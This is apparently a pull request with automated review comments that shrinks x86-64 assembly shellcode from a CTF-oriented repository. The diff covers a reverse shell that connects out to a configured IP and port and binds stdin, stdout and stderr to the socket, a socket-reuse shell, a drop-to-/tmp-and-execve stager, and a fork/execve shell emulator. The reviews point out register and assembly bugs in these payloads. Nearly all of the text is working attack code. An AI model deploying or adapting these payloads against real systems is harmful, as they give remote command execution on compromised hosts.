Small optimizations #13
wants to merge 11 commits into
base: master
44 changes: 17 additions & 27 deletions 64bitPutFileOnDisk/shell64.s
Expand Up @@ -25,22 +25,15 @@ main:
; r9 = 0

; mmap(0, 1M, PROT_READ|PROT_WRITE, MAP_PRIVATE, input_fd, 0)
mov r8, rdx ; r8 = input
mov r8, rbx ; r8 = input

xor rdi, rdi ; rdi = 0

mov rdx, rdi
mov rax, rdi
mov rcx, rdi
mov r8, rdi
mov r9, rdi

mov rsi, rdi
mov sil, 0x1
shl rsi, 22 ; rsi = 4M

mov dl, 0x3 ; rdx = 0x3
mov cl, 0x2 ; rdl = 0x2
xor edi, edi ; rdi = 0
xor eax, eax
xor esi, esi
bts esi, 22 ; rsi = 4M
xor r9d, r9d
lea edx, [rdi+0x3] ; rdx = 0x3
lea ecx, [rdi+0x2] ; rdl = 0x2

mov al, __NR_mmap
syscall ; call mmap
Expand All @@ -51,32 +44,29 @@ main:
mov r9, rsi ; r9 = size

; open(filename, O_CREAT|O_RDWR, 0700)
xor rax, rax
mov rdi, rax
mov rdx, rax
push rax,
xor eax, eax
push rax
push qword stackcookie ; TODO verify this
push 0x706d742f ; stack = /tmp/filename\0
mov rdi, rsp ; rdi = stack
mov rsi, rax
mov sil, 0x42 ; ril = O_CREAT|O_RDWR
mov dl, 0x7
shl dl, 0x6
lea esi, [rax+0x42] ; ril = O_CREAT|O_RDWR
lea edx, [rax+0x7]
shl edx, 0x6
mov al, __NR_open
syscall ; call open

; write(output, buffer, size)
mov rdi, rax ; rdi = output
mov rsi, r8 ; rsi = buffer
mov rdx, r9 ; rdx = size
xor rax, rax
xor eax, eax
mov al, __NR_write
syscall ; call write

; exec(filename, 0, 0)
mov rdi, rsp ; rdi = filename
xor rsi, rsi ; rsi = 0
mov rdx, rsi ; rdx = 0
mov rax, rsi ; rax = 0
xor esi, esi ; rsi = 0
xor edx, edx ; rdx = 0
xor eax, eax ; rax = 0
mov al, __NR_execve
syscall ; call execve
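Review bot: `lea ecx, [rdi+0x2]` (the MAP_PRIVATE flags for mmap) still lands in rcx, but the Linux x86-64 syscall ABI takes the fourth argument in r10, and `syscall` itself clobbers rcx, so the flags never reach the kernel unless r10 is set somewhere outside the hunk. The removed `mov cl, 0x2` had the same register mix-up; the new line should be `lea r10d, [rdi+0x2] ; r10 = MAP_PRIVATE (4th syscall arg)`. The comment above the block still reads `mmap(0, 1M, ...)` while `bts esi, 22` produces 4M, so one of the two should be corrected. main starts before the first hunk and the second hunk's end is not visible here.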
33 changes: 16 additions & 17 deletions 64bitSocketReuse/shell64.s
Expand Up @@ -16,41 +16,40 @@ global main

main:
mov rsi,rsp ; TODO is this too early?
xor si,si ; rsi=some valid stack address
and rsi,0xf0000 ; rsi=some valid stack address

push byte 20 ;adjust for the popularity of the ctf
pop rdi
xor edx, edx
lea edi, [rdx+20] ;adjust for the popularity of the ctf

;; rdi is the starting fd to read from, we try each in decending order
push byte 4;read 4 bytes
pop rdx

;; rdi is the starting fd to read from, we try each in descending order
mov dl, 4 ;read 4 bytes
mov ebx, MAGIC
ourread:
dec rdi
sub edi, 1
%ifdef DEBUG
jnz ourread.next
int 3; this breakpoint triggers if we DON'T find the magic number
hlt
%endif

.next:
SYSTEM_CALL(read)
xor eax, eax
mov al, read
syscall

cmp al,4 ;check to see if we've received our 4 bytes
jnz ourread ;if not, try with another file descriptor
;;TODO: lets get rid of this cmp al,4 nonsense and save some bytes.
cmp [rsi], MAGIC ;this is our magic number %defined on top
cmp ebx, [rsi] ;this is our magic number %defined on top
jnz ourread ; if we don't match try another file descriptor


;; this dup2 code attaches stdin stdout and stderr to our socket
;; so that we can talk to whatever program we run later
mydup2:
push byte 2
pop rsi
xor eax, eax
lea esi, [rax+2] ; loop count and fd
copy_stdin_out_err:
SYSTEM_CALL(dup2)
dec rsi
mov al, dup2
syscall
sub esi,1
jns copy_stdin_out_err


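Review bot: `and rsi,0xf0000` no longer derives a stack address from rsp: it keeps only bits 16–19, so rsi ends up somewhere in 0x0–0xf0000, nowhere near an x86-64 user stack, and the following `read` into [rsi] would fault. The replaced `xor si,si` cleared the low 16 bits of rsp; the equivalent is `and rsi, -0x10000 ; rsi = rsp & ~0xffff`. In copy_stdin_out_err, `mov al, dup2` after `syscall` assumes the previous dup2 returned a small non-negative fd so the upper bits of rax are already zero; on a -errno return the loop would issue a wrong syscall number, which is probably harmless here but deserves a comment, and the same pattern appears in reverse64IPv4/r64.s. main's body continues past the end of this section.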
79 changes: 36 additions & 43 deletions 64shellEmulator/shell64.s
Expand Up @@ -11,47 +11,45 @@
main:

do_fork:
push byte fork
pop rax
SYSTEM_CALL
test rax,rax
xor eax, eax
mov al fork
syscall
test eax,eax
jz child
parent:
push wait4
pop rax
xor rdi,rdi ;pid
xor rsi,rsi ;status
xor rdx,rdx ;options
xor rcx,rcx ;struct rusage*=NULL
SYSTEM_CALL ;wait(0,0,0,0);
xor edi,edi ;pid
xor esi,esi ;status
xor edx,edx ;options
xor ecx,ecx ;struct rusage*=NULL
lea eax,[rdi+wait4]
syscall ;wait(0,0,0,0);
jmp main

child:
cld
get_input:
xor rax,rax
cdq
mov dx,BUFFERLEN ;size of read
xor eax,eax
lea edx,[rax+BUFFERLEN] ;size of read
mov r8d, edx ;save readsize
sub rsp,rdx ;make some room on the stack
mov rsi,rsp ;use new stack space as buffer for read
xor rdi,rdi ;fd
xor edi,edi ;fd
mov al,read
SYSTEM_CALL ;read into stack buffer
syscall ;read into stack buffer

mov rbp,rax ;save len of str_read
test rax,rax ;we must read more than 0 bytes
mov ebp,eax ;save len of str_read
test eax,eax ;we must read more than 0 bytes
jz do_exit ;synchronous IO or GTFO
mov byte [rax+rsp-1],0 ;replace newline with nullbyte
push rax ;save strlen on the stack
xor edx, edx
lea rcx, [rax+rsp]
mov byte [rcx-1],dl ;replace newline with nullbyte


;; let's parse the arguments here
pop rcx ;return of read pushed by get_input
push byte " " ;delimiter
pop rax ;we're going to inline a strchr
mov ecx,eax ;return of read pushed by get_input
lea eax, [rdx+0x20] ;" " (space) is the delimiter
mov rbx,rsp ;rbx is the buffer
xor rdx,rdx
add rsp,BUFFERLEN ;rsp is now going to be argv
xor edx,edx
add rsp,r8 ;rsp is now going to be argv
add_token: ;; calculate the pointer to push

mov rsi,rbp ;number of chars in buffer
Expand All @@ -60,33 +58,28 @@ add_token: ;; calculate the pointer to push

lea rdi,[rbx + rsi] ;rdi points to current token
mov [rsp+rdx*8], rdi ;save the current token pointer building argv
inc rdx ;increment index into argv


add edx, 1 ;increment index into argv
scan_loop:
repne scasb

mov rsi,rbp
sub rsi,rcx
mov byte[rbx+rsi-1],0 ;null terminate each token (strtok)

xor eax, eax
mov byte[rbx+rsi-1],al ;null terminate each token (strtok)
mov al, 0x20 ; delimiter
test rcx,rcx
jz exec

jmp short add_token
jnz short add_token

exec:
xor rax,rax
xor eax,eax
mov [rsp+rdx*8],rax
cdq

mov al,execve
mov rdi,rbx
mov rsi,rsp
;; rdx=null
SYSTEM_CALL ;execve(cmd,args,environ=NULL);
xor edx, edx ; rdx=null
syscall ;execve(cmd,args,environ=NULL);

do_exit:;; exit nicely if anything fails
push byte exit
pop rax
xor rdi,rdi
SYSTEM_CALL
xor edi,edi
lea eax,[rdi+exit]
syscall
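Review bot: `mov al fork` in do_fork is missing the comma between its operands and will not assemble; it should read `mov al, fork`. In exec, rdx is zeroed twice (`cdq` right after `xor eax,eax`, then `xor edx, edx` before the syscall); one of the two can go, and `; rdx = envp = NULL` says more than a bare `cdq`. The `jz exec` followed by `jnz short add_token` always takes the second branch, so a plain `jmp short add_token` reads more honestly. In get_input, `test eax,eax` only catches a zero-length read; a negative return from read would fall through and be used as a stack index, so `js do_exit` right after the test would close that gap. add_token is cut between the two hunks, so its middle is not visible here.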
32 changes: 16 additions & 16 deletions reverse64IPv4/r64.s
Expand Up @@ -24,33 +24,33 @@ BITS 64
main:

open_my_socket:
push byte AF_INET
pop rdi
push byte SOCK_STREAM
pop rsi
push byte ANY_PROTO
pop rdx
SYSTEM_CALL(socket)
xor edx, edx; ANY_PROTO
lea edi, [rdx+AF_INET]
lea esi, [rdx+SOCK_STREAM]
lea eax, [rdx+socket]
syscall

xchg rax,rdi
make_sockaddr:
push byte 0 ;lame part of sockaddr
xor edx, edx
push rdx ;lame part of sockaddr
mov rax, (IP <<32 | PORT <<16 | AF_INET)
push rax ;important part of sockaddr

mov rsi,rsp ;struct sockaddr*
push 0x10
pop rdx ;addrlen
;RDI=sockfd
SYSTEM_CALL(connect)
lea eax, [rdx+connect]
mov dl, 0x10
syscall
;; assume success (RAX=0)


push byte 2 ;loop count and FD#
pop rsi
xor eax, eax
lea esi, [rax+2] ;loop count and FD#

copy_stdin_out_err:
SYSTEM_CALL(dup2)
dec rsi
mov al, dup2
syscall
dec esi
jns copy_stdin_out_err

;; Any local shellcode here
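Review bot: `lea eax, [rdx+connect]` in make_sockaddr depends on rdx still being zero from the `xor edx, edx` five instructions earlier, across two pushes and a `mov rax`; that invariant is easy to break on the next edit and should be stated, e.g. `; rdx == 0 from xor above, reused as lea base`. `xor edx, edx; ANY_PROTO` replaces the named constant with a literal zero, so if ANY_PROTO is ever redefined to a non-zero value the socket call silently changes; an assemble-time `%if ANY_PROTO != 0` guard with `%error` would keep the constant honest. The dup2 loop here uses `dec esi` while the identical loop in 64bitSocketReuse/shell64.s was changed to `sub esi,1`; the two files should pick one form. The rest of main after the dup2 loop is outside this section.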